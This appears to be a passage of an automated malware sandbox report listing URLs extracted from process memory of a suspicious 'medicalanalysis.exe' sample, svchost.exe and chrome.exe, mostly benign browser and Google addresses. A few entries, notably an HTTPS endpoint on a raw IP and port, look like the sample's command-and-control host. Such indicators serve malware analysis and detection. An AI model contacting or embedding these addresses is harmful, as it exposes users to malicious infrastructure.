                                      https://duckduckgo.com/chrome_newtabsvchost.exe, 00000010.00000003.2500265558.0000018B29A2A000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520309023.0000643402E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=chrome.exe, 00000011.00000002.2520449739.0000643402E50000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingchrome.exe, 00000011.00000002.2513271848.000064340228C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://anglebug.com/6755serchrome.exe, 00000011.00000002.2516237567.00006434027B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonechrome.exe, 00000011.00000002.2518184561.0000643402B10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516651957.0000643402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515512393.0000643402680000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://anglebug.com/4633chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.google.com/chrome/tips/gsOpenchrome.exe, 00000011.00000002.2517253822.000064340297C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://127.0.0.1:8000/299e36a8/4a1b3c1ainFramechrome.exe, 00000011.00000002.2521399462.0000643402F9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://anglebug.com/7382chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.medicallanalysis.exe, 0000000A.00000002.2247526818.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, prefs.js.10.drfalse
                                                          		high
                                                          https://issuetracker.google.com/284462263chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520356636.0000643402E2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEklychrome.exe, 00000011.00000002.2516696085.00006434028A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516651957.0000643402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://anglebug.com/7714chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://unisolated.invalid/chrome.exe, 00000011.00000002.2518184561.0000643402B10000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.google.com/chrome/tips/chrome.exe, 00000011.00000002.2514187223.00006434023AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2518184561.0000643402B10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2517253822.000064340297C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://anglebug.com/6248chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://duckduckgo.com/favicon.icomentschrome.exe, 00000011.00000002.2520309023.0000643402E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://anglebug.com/6929chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://anglebug.com/5281chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemedicalanalysis.exe, 00000001.00000002.2218187485.00000000023E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94medicallanalysis.exe, 0000000A.00000002.2247526818.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, prefs.js.10.drfalse
                                                                                		high
                                                                                https://104.37.175.218:7982/da03ab84e7f8187e6/v3iuaiea.tsf2oxsvchost.exe, 00000007.00000002.2328336036.0000000002B3C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://issuetracker.google.com/255411748chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520356636.0000643402E2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 00000011.00000002.2516696085.00006434028A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516651957.0000643402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://anglebug.com/7246chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516237567.00006434027B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://stackoverflow.com/q/14436606/23354medicalanalysis.exe, 00000001.00000002.2229470684.00000000058E0000.00000004.08000000.00040000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2218187485.0000000002427000.00000004.00000800.00020000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.000000000360A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://anglebug.com/7369chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://anglebug.com/7489chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://duckduckgo.com/?q=chrome.exe, 00000011.00000002.2520309023.0000643402E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516198359.0000643402790000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://chrome.google.com/webstorechrome.exe, 00000011.00000002.2514699100.00006434024A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 00000011.00000002.2520449739.0000643402E50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=svchost.exe, 00000010.00000003.2500265558.0000018B29A2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctamedicallanalysis.exe, 0000000A.00000002.2247526818.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, prefs.js.10.drfalse
                                                                                                        		high
                                                                                                        https://issuetracker.google.com/161903006chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520356636.0000643402E2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.ecosia.org/newtab/svchost.exe, 00000010.00000003.2500265558.0000018B29A2A000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://duckduckgo.com/favicon.icochrome.exe, 00000011.00000002.2520309023.0000643402E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000011.00000002.2517213852.0000643402960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515428710.0000643402634000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000011.00000002.2518184561.0000643402B10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516651957.0000643402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515512393.0000643402680000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://anglebug.com/3078chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://anglebug.com/7553chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://anglebug.com/5375chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://erdogansigorta.commedicalanalysis.exe, 00000001.00000002.2218187485.00000000023E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://anglebug.com/5371chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://anglebug.com/4722chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://m.google.com/devicemanagement/data/apichrome.exe, 00000011.00000002.2514187223.00006434023AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000011.00000002.2517213852.0000643402960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515428710.0000643402634000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://127.0.0.1/chrome.exe, 00000011.00000002.2513237822.0000643402280000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2518545007.0000643402BE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516198359.0000643402790000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2513962060.000064340234C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516043203.000064340273C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://anglebug.com/7556chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://chromewebstore.google.com/chrome.exe, 00000011.00000002.2513125866.000064340223C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplessvchost.exe, 00000010.00000003.2502718278.0000018B2C605000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://anglebug.com/7036jchrome.exe, 00000011.00000002.2518935557.0000643402C48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://clients4.google.com/chrome-syncchrome.exe, 00000011.00000002.2514187223.00006434023AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://anglebug.com/7406)chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://unisolated.invalid/achrome.exe, 00000011.00000002.2518184561.0000643402B10000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://anglebug.com/6692chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://issuetracker.google.com/258207403chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520356636.0000643402E2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://anglebug.com/3502chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://anglebug.com/3623chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://anglebug.com/3625chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://anglebug.com/3624chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://anglebug.com/5007chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2518935557.0000643402C48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://chrome.google.com/webstore?hl=en-GBchrome.exe, 00000011.00000002.2520309023.0000643402E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2518501288.0000643402BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://anglebug.com/3862chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000011.00000003.2499201930.0000643402EC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519080554.0000643402C97000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498912565.0000643402EA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2517689557.0000643402A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520803728.0000643402EB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2513764914.0000643402308000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520759509.0000643402EA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2514699100.00006434024A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://www.ecosia.org/search?q=&addon=opensearchchrome.exe, 00000011.00000002.2520449739.0000643402E50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://anglebug.com/4836chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://issuetracker.google.com/issues/166475273chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498145632.0000643402D6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://ch.search.yahoo.com/favicon.icochrome.exe, 00000011.00000002.2520309023.0000643402E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://127.0.0.1:8000/299e36a8/4a1b3c1aEl$chrome.exe, 00000011.00000002.2511976366.0000456C00248000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://anglebug.com/4384chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516237567.00006434027B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://stackoverflow.com/q/11564914/23354;medicalanalysis.exe, 00000001.00000002.2229470684.00000000058E0000.00000004.08000000.00040000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.000000000360A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://anglebug.com/3970chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516237567.00006434027B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePWchrome.exe, 00000011.00000002.2518184561.0000643402B10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516651957.0000643402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515512393.0000643402680000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certschrome.exe, 00000011.00000002.2518435662.0000643402B8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoingchrome.exe, 00000011.00000002.2516198359.0000643402790000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://104.37.175.218:7982/da03ab84e7f8187e6/v3iuaiea.tsf2oSymbosvchost.exe, 00000010.00000003.2533266053.0000018B29ADF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2510490271.0000018B29ADF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2737048443.0000018B29AE0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2475489229.0000018B29AD5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2387952475.0000018B29AD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://anglebug.com/7604chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://anglebug.com/7761chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516237567.00006434027B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://anglebug.com/7760chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516237567.00006434027B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgmedicallanalysis.exe, 0000000A.00000002.2247526818.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, prefs.js.10.drfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icosvchost.exe, 00000010.00000003.2500265558.0000018B29A2A000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515428710.0000643402634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516198359.0000643402790000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://anglebug.com/5901chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://anglebug.com/3965chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://anglebug.com/6439chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://anglebug.com/7406chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://anglebug.com/7161chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://anglebug.com/7162chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
